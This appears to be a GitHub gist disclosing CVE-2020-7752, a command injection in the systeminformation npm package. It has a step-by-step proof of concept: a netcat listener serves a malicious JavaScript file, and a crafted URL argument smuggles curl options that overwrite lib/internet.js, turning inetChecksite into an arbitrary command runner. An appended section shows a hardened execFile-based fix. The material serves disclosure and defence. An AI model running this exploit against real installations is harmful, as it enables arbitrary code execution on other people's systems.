@EffectRenan
Last active November 12, 2020 02:30
systeminformation - Command Injection

Vulnerability: Command Injection - CVE-2020-7752

References:

Package name: systeminformation

Tested package versions: 4.27.9, 4.27.10

Description: An attacker who controls the URL argument can append extra curl parameters to it, overwrite JavaScript files of the package, and then execute arbitrary OS commands.

Sensitive file: lib/internet.js

The child_process.exec() function executes the following command:

curl -I --connect-timeout 5 -m 5 $urlSanitized 2>/dev/null | head -n 1 | cut -d " " -f2 # $urlSanitized is the user input.

Steps To Reproduce:

Create a JavaScript file with the content below (file.js):

const { exec } = require('child_process')
function inetChecksite(url) {
  return exec(url)
}
exports.inetChecksite = inetChecksite

Use Netcat to start a TCP server on port 443 that sends the JavaScript file created above:

sudo nc -nlp 443 < file.js

Execute the code below to overwrite the JavaScript file (lib/internet.js):

const si = require('systeminformation')
const HOST = "127.0.0.1:443"

// The telnet scheme was chosen to avoid an issue with the protocol response check, as with HTTP (HTTP/1.0 200 OK in the first line).
si.inetChecksite(`telnet://${HOST} --no-buffer -o node_modules/systeminformation/lib/internet.js`)

setTimeout(() => {
  process.exit()
}, 2000)

Now we can execute OS commands:

const si = require('systeminformation')
si.inetChecksite("<Some OS command>")
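
A defensive counterpart to the steps above, as an added example that is not code from this gist or from the systeminformation project: `vulnerableCommand` reproduces the command string shown for lib/internet.js, while the hypothetical `buildCurlArgs` and `checkSite` show one way to close the injection point by allowing only http(s) URLs and calling curl through `execFile` with a fixed argument array. The function names and the sample inputs are assumptions constructed for illustration.

```javascript
const { execFile } = require('child_process')

// The command string the page shows for lib/internet.js: the input is pasted
// into a shell line, so the shell splits it on whitespace into extra curl options.
function vulnerableCommand(url) {
  return `curl -I --connect-timeout 5 -m 5 ${url} 2>/dev/null | head -n 1 | cut -d " " -f2`
}

// Hypothetical hardened builder: returns an argv array for execFile() or throws.
function buildCurlArgs(input) {
  let url
  try {
    url = new URL(String(input))
  } catch (err) {
    throw new Error('rejected: not a parseable URL')
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    throw new Error(`rejected: scheme ${url.protocol} is not allowed`)
  }
  // url.href is normalized: spaces are percent-encoded and the string always
  // starts with "http", so curl receives one argument it cannot read as an option.
  return ['-I', '--connect-timeout', '5', '-m', '5', url.href]
}

// Hypothetical replacement for the site check: no shell, fixed argv, and the
// status code is parsed in JavaScript instead of with head/cut.
function checkSite(input, callback) {
  let args
  try {
    args = buildCurlArgs(input)
  } catch (err) {
    return callback(err)
  }
  execFile('curl', args, { timeout: 10000 }, (err, stdout) => {
    if (err) return callback(err)
    const status = Number(stdout.split(/\r?\n/)[0].split(' ')[1])
    callback(null, Number.isInteger(status) ? status : null)
  })
}

// Constructed sample input shaped like the one in the steps above.
const SAMPLE = 'telnet://127.0.0.1:443 --no-buffer -o out.js'

function classify(input) {
  try { buildCurlArgs(input); return 'accepted' } catch (err) { return err.message }
}
```

`classify(SAMPLE)` reports a rejection, while `vulnerableCommand(SAMPLE)` shows the `-o` option landing in the shell line as a separate word.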